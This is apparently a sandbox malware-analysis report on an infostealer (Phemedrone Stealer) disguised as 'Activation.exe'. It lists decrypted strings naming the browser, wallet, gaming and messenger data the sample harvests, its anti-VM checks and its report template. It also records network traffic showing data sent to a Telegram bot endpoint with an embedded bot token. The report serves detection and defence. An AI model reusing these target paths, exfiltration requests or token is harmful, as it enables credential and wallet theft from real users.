            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Last Version
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: .
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Gecko
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Profiles
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: key3.db
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: key4.db
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: cookies.sqlite
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: moz_cookies
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: formhistory.sqlite
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: moz_formhistory
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: logins.json
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: encryptedUsername
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: encryptedPassword
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hostname
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: [^ -]
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 1
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: metaData
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: password
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 2A864886F70D010C050103
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ISO-8859-1
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: password-check
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 2A864886F70D01050D
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nssPrivate
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: -
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *.ini
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: global-salt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Version
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CryptoWallets
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: wallet.dat
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Wallets/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Armory
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Atomic
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: atomic\Local Storage\leveldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Bytecoin
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bytecoin
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Coninomi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Coinomi\Coinomi\wallets
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Jaxx
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Electrum\wallets
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Exodus\exodus.wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guarda
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guarda\Local Storage\leveldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ZCash
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Zcash
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\recentservers.xml
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\sitemanager.xml
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FTP/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *ssfn*
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: \config
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *.vdf
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Software\Valve\Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Apps
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Name
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Unknown
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Name:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GameID:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam/Games.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Valve\Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SteamPath
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Discord
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *cord*
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Telegram
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: HKEY_CLASSES_ROOT\tg\DefaultIcon
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: tdata
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: s
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Messengers/Telegram/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileGrabber
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Information
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ,d88b.d88b, 88888888888 Phemedrone Stealer `Y8888888Y' {0:dd/MM/yyyy HH:mm:ss} `Y888Y' Developed by https://t.me/webster480 & https://t.me/TheDyer `Y' Tag: {1} ----- Geolocation Data -----{2,-25}{3}{4,-25}{5} ({6}){7,-25}{8}{9,-25}{10}{11,-25}{12} ----- Hardware Info -----{13,-25}{14}\{15} {16,-25}{17} {18}{19,-25}{20}{21,-25}{22}{23,-25}{24}{25,-25}{26}{27,-25}{28} GB ----- Report Contents -----{29,-25}{30}{31,-25}{32}{33,-25}{34}{35,-25}{36}{37,-25}{38}{39,-25}{40}{41,-25}{42}{43}{44} ----- Miscellaneous -----{45,-25}{46}{47,-25}{48}{49,-25}{50}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: IP:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ip
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Country:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: country
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: country_code
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: City:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: city
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Postal:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: asn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MAC:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Username:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Windows name:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: x32
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: x64
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Hardware ID:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Screen Resolution:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GPU:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: {0,-25}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CPU:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: RAM:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Credit Cards:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: AutoFills:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Extensions:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Wallets:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Files:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: {0,-25}{1}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Antivirus products:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ,
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: File Location:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: unknown
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Clipboard text:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Information.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CiAgICAsZDg4Yi5kODhiLCAgICAKICAgIDg4ODg4ODg4ODg4ICAgIFBoZW1lZHJvbmUgU3RlYWxlcgogICAgYFk4ODg4ODg4WScgICAgRGV2ZWxvcGVkIGJ5IGh0dHBzOi8vdC5tZS93ZWJzdGVyNDgwICYgaHR0cHM6Ly90Lm1lL1RoZUR5ZXIKICAgICAgYFk4ODhZJyAgICAgIAogICAgICAgIGBZJyAgICAgICAgCiAgICAgICAgIAo9PT09PT09PT09PT09PT09PT09PT09TElOS1M9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CkNoYW5uZWw6IGh0dHBzOi8vdC5tZS9mcmVha2NvZGluZ3Nwb3QKQ2hhdDogaHR0cHM6Ly90Lm1lLytUUXRQLXIwQjZYWTBPREk2Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIVdBUk5JTkchIEFMTCBDT0RFIElTIEZPUiBJTlRST0RVQ1RPUlkgUFVSUE9TRVMKV0UgQVJFIE5PVCBSRVNQT05TSUJMRSBGT1IgWU9VUiBBQ1RJT05TICFXQVJOSU5HIQ==
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *Phemedrone Stealer Report* \| by @webster480 & @TheDyer``` - IP: {0} \({1}\) - Tag: {2} {3} - Passwords: {4} - Cookies: {5} - Wallets: {6}```{7}{8}@freakcodingspot
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: \.
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: (
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: )
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ]
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: -Phemedrone-Report.zip
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: [UNKNOWN]0.0.0.0-Phemedrone-Report.zip
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: x
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: https://get.geojs.io/v1/ip/geo.json
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: root\SecurityCenter2
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SELECT * FROM AntivirusProduct
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: displayName
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: X2
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: :
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SELECT * FROM Win32_VideoController
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SELECT * FROM Win32_ComputerSystem
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: TotalPhysicalMemory
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 0
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Win32_Processor
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ProcessorId
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Win32_DiskDrive
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SerialNumber
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SELECT * FROM
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: UNKNOWN
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ProductName
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Screenshot
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: user32.dll
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GetDC
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: gdi32.dll
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GetDeviceCaps
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Screenshot.png
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: file
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: filename
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: filedescription
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: POST
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ----------------------------
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: multipart/form-data; boundary=
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: --
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Content-Disposition: form-data; name="
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: "; filename="
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: "
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Content-Type: application/octet-stream
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: .phem
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: https://api.telegram.org/bot{0}/sendDocument
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: document
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: chat_id
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: parse_mode
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MarkdownV2
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: caption
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: wireshark
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: httpdebbugerui
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mtmproxy
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: sniffer
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VirtualBox
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VBox
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VMware Virtual
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VMware
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Hyper-V Video
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Microsoft
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ru-RU
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kk-KZ
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ro-MD
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: uz-UZ
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: be-BY
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: az-Latn-AZ
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hy-AM
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ky-KG
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: tg-Cyrl-TJ
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Account ID:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Token:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Browser:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Value:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: URL:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Username:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Password:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: v
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: (
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Number: {0}Placeholder: {1}Expiration: {2}/{3}Browser: {4} v{5} ({6})
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *.ldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: encrypted_key
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: DPAPI
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CHEATS
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: celka.
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nursultan.
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: xone
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: akrien
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: interium
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nixware
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: skeet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GAMES
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: roblox.com.
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: genshin
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: minecraft.net
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: epicgames.com
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: steampowered.com
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BANK
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: tinkoff
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: sberbank
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MONEY
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: yoomoney
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: amazon
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: funpay
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: americanexpress
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CRYPTO
            Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.9:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
            Source: Binary string: System.Xml.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: HPHo,C:\Windows\System.pdb source: Activation.exe, 00000000.00000002.1645404055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Configuration.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdb source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbL0Tw# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbTV source: Activation.exe, 00000000.00000002.1645685696.0000000000A85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb\ source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb;( source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Activation.exe, 00000000.00000002.1650751818.0000000000D08000.00000040.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdbh source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.9:49746 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.26.1.100 104.26.1.100
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42ceeHost: api.telegram.orgContent-Length: 710510Expect: 100-continueConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: get.geojs.io
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42ceeHost: api.telegram.orgContent-Length: 710510Expect: 100-continueConnection: Keep-Alive
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
            Source: Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
            Source: Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.iod
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.teleLR
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocumentd
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geoj8
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
